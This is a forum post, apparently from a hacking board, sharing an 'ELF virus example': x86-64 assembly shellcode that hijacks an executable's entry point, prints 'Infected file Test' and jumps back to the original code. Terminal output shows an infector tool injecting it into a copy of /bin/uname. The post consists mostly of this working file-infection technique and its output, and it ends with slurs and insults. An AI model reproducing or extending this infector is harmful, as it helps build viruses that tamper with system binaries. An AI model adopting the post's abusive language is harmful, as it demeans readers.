mesvak 364 this is so simple just you needa know knowing stuff in C/C++ knowing stuff in Intel x86 assembly Knowledge of the WinAPI and its documentation Knowledge of the PE file structure Knowledge of Dynamic Linked Libraries [hide] poc .c written in c++ and asmbelly code section .text global _start _start: sub r12, 0x4f20 push rax push rdi push rsi push rdx mov rax,1 ; [1] - sys_write mov rdi,1 ; 0 = stdin / 1 = stdout / 2 = stderr lea rsi,[rel msg] ; pointer(mem address) to msg (*char[]) mov rdx, msg_end - msg ; msg size syscall ; calls the function stored in rax pop rdx pop rsi pop rdi pop rax jmp r12 align 8 msg db 'Infected file Test',0x0a,0 msg_end db 0x0 and usage written by shitty hands $ cp / bin / uname evil_uname $ ./niga evil_uname ELF virus example Running in offset mode + Mapped file (35032 bytes) at 0x7fff7ae5a540 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) offset == 0x4f20 $ #change offset on shellcoda.asm $ nasm -f elf64 shellcode.asm $ ./niga evil_uname shellcode.o ELF virus example + Mapped file (35032 bytes) at 0x7ffc51d5d920 + Processing Victim -> Entry point value: 0x1f60 + Processing Victim -> Found .text segment executable (# 2) * Processing Victim -> Found segment LOAD (# 3) closed for .text (offset: 0x7990) + Processing victim -> Base Address: 0x (nil) + Mapped file (704 bytes) in 0x7ffc51d5d928 + Payload Process -> Number of Sections in the Payload file: 5. Searching for the '.text' section + Processing payload -> sname: '' + Processing payload -> sname: '.text' has entered the returning if shdr-> sh_name: 1 shdr-> sh_type: 1 shdr-> sh_addr: 0 + Processing Payload -> Section .text Payload file found in offset 180 (Size: 4a bytes) $ ./evil_uname Infected file Test me no gae u are all retarded plebs Xd Linux [/hide] Quote Share this post Link to post Share on other sites